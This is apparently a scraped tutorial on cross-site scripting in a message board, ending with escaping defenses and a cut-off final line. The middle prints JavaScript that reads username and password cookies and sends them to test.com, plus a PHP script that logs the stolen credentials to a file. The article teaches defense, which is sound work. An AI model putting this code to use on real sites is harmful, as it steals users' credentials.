XSS vulnerability for cross-site scripting attacks

Source: Internet
Author: User
Tags: flock

The AddElement() method adds a new message, and the RenderComments() method displays the message list. The Web page looks like this:


Because we fully trust the user's input, a user with ulterior motives can enter input like this:

So no matter who accesses this page, the console will output "Hey you is a fool fish!". If this were only a malicious little joke it would be harmless, but not everyone's intentions are that cute: some users will use this vulnerability to steal user information, trick people into opening malicious websites or downloading malicious programs, and so on. Look at the simplest example.

Using XSS to steal user names and passwords

Of course, this example is so simple that it would hardly work against any real website; it is only here to show how the attack works. We know that many login pages offer to remember the user name and password to make the next login easier, and some sites store the user name and password in cookies in clear text. A malicious user registers an account, logs in, and uses a simple tool to inspect the names and structure of the cookies. If the site has an XSS vulnerability, it is then easy to use JSONP to obtain the user names and passwords of other users.

A malicious user would enter this:

Let's see what is hidden in http://test.com/hack.js.

// CookieHelper is the post's own cookie-reading helper, not a standard browser API.
var username = CookieHelper.getCookie('username').value;
var password = CookieHelper.getCookie('password').value;
var script = document.createElement('script');
script.src = 'http://test.com/index.php?username=' + username + '&password=' + password;
document.body.appendChild(script);

These few lines of JavaScript read the user name and password from the cookie and use JSONP to send a GET request to http://test.com/index.php, whose code is:

<?php
if (!empty($_GET['password'])) {
    $username = $_GET['username'];
    $password = $_GET['password'];
    try {
        // Append the received credentials to a text file under the web root.
        $path = $_SERVER['DOCUMENT_ROOT'] . '/password.txt';
        $fp = fopen($path, 'a');
        flock($fp, LOCK_EX);
        fwrite($fp, "$username\t$password\r\n");
        flock($fp, LOCK_UN);
        fclose($fp);
    } catch (Exception $e) {
    }
}
?>

This lets a malicious user steal information from every user who visits the message board.

How to prevent

The demo above is a very simple XSS attack. There are many more hidden variants, but the core of all of them is script injection, so the solution is simple: do not trust user input, and escape special characters such as "<" and ">". This prevents the problem at its root. Of course, many platforms have their own XSS protections; for example, in ASP.NET, Microsoft's ValidateRequest automatically performs XSS validation of form submissions. Even so, there will always be some clever malicious user who comes to sabotage our site, and if you are not at ease about your own site you can use the XSS cross-site test code collection to test whether it is safe.

When the system needs to show a message, it simply redirects the user to Showmessage.ashx?msg=message, for example:

Response.Redirect("Showmessage.ashx?msg=user name cannot be empty!");

We can check the request data: if it contains "<", treat the request as malicious and refuse the submission. ASPX adopts this strategy by default. Its disadvantage is that if you are building a programmers' forum, programmers will not be able to post HTML code, so a better strategy is to display the content a user publishes as-is rather than as HTML. HttpUtility.HtmlEncode converts special characters such as "<" and ">" in a string into HTML display characters; that is, <script> is no longer treated as a tag that defines a script but as "&lt;script&gt;", so the content is displayed directly on the page.
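The message board's render step in both forms, as an added example that is not code from the original post: the vulnerable concatenation beside a version that encodes untrusted fields the way HttpUtility.HtmlEncode does. The function names, the { user, text } message shape and the sample messages are assumptions.

```javascript
// Encode the five characters that let text break out of an HTML text node
// or attribute value; this mirrors what HttpUtility.HtmlEncode does in ASP.NET.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  })[ch]);
}

// Vulnerable render: message text is concatenated straight into the markup,
// so a message containing <script> becomes a real script element in the page.
function renderCommentsUnsafe(messages) {
  return messages.map((m) => `<li>${m.user}: ${m.text}</li>`).join('');
}

// Hardened render: each untrusted field is encoded first, so the browser shows
// the literal characters instead of interpreting them as tags.
function renderCommentsSafe(messages) {
  return messages
    .map((m) => `<li>${escapeHtml(m.user)}: ${escapeHtml(m.text)}</li>`)
    .join('');
}

// A check in the spirit of ValidateRequest, applied to the rendered output:
// does it still contain an unencoded opening script tag?
function containsRawTag(html) {
  return /<\s*script\b/i.test(html);
}

// Constructed sample data: one benign message, one carrying a script tag
// (assumed shape { user, text }; not the original post's data).
const sampleMessages = [
  { user: 'alice', text: 'Hello board' },
  { user: 'mallory', text: '<script>console.log("injected")</script>' },
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderCommentsUnsafe(sampleMessages)); // contains a live <script>
  console.log(renderCommentsSafe(sampleMessages));   // shows &lt;script&gt; as text
}
```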

Modify the view-post code, context.Response.Write(line + "
